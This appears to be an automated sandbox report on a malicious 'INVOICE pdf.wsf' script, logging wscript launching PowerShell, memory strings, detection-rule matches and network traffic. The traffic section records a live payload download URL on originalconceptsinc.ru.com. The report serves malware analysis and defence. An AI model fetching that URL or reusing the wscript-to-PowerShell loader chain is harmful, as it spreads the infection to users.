Source: http://pesterbdd.com/images/Pester.png |
URL Reputation: Label: malware |
Source: INVOICE pdf.wsf |
ReversingLabs: Detection: 15% |
Source: |
Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: System.Core.pdb source: powershell.exe, 0000000A.00000002.4119942643.0000000008889000.00000004.00000020.00020000.00000000.sdmp |
Source: |
Binary string: stem.Core.pdb* source: powershell.exe, 0000000A.00000002.4119415851.0000000008820000.00000004.00000020.00020000.00000000.sdmp |
Source: C:\Windows\System32\wscript.exe |
Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 1 |
Source: global traffic |
HTTP traffic detected: GET /asdt/Kardinaliteter.pfb HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Host: originalconceptsinc.ru.com
Connection: Keep-Alive |
Source: unknown |
UDP traffic detected without corresponding DNS query: 1.1.1.1 |
Source: unknown |
DNS traffic detected: queries for: originalconceptsinc.ru.com |
Source: powershell.exe, 0000000A.00000002.4109661918.0000000007669000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsoft |
Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000007.00000002.4087877267.000002448B88B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448A404000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.4087877267.000002448BD8D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://originalconceptsinc.ru.com |
Source: powershell.exe, 00000007.00000002.4087877267.000002448A1F7000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbP |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://originalconceptsinc.ru.com/asdt/Kardinaliteter.pfbXR |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 0000000A.00000002.4109661918.000000000771E000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://www.microsoft. |
Source: powershell.exe, 00000007.00000002.4087877267.0000024489FD1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore68 |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004C11000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://aka.ms/pscore6lB |
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 0000000A.00000002.4087319648.0000000004D68000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000007.00000002.4087877267.000002448B1AA000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://go.micro |
Source: powershell.exe, 00000007.00000002.4185249372.000002449A046000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.4098203498.0000000005C7E000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: amsi32_7984.amsi.csv, type: OTHER |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7732, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: Process Memory Space: powershell.exe PID: 7984, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: INVOICE pdf.wsf |
Static file information: Suspicious name |
Source: C:\Windows\System32\wscript.exe |
Process created: Commandline size = 7069 |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: Commandline size = 7069 |
|
Source: C:\Windows\System32\wscript.exe |
COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c dir |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |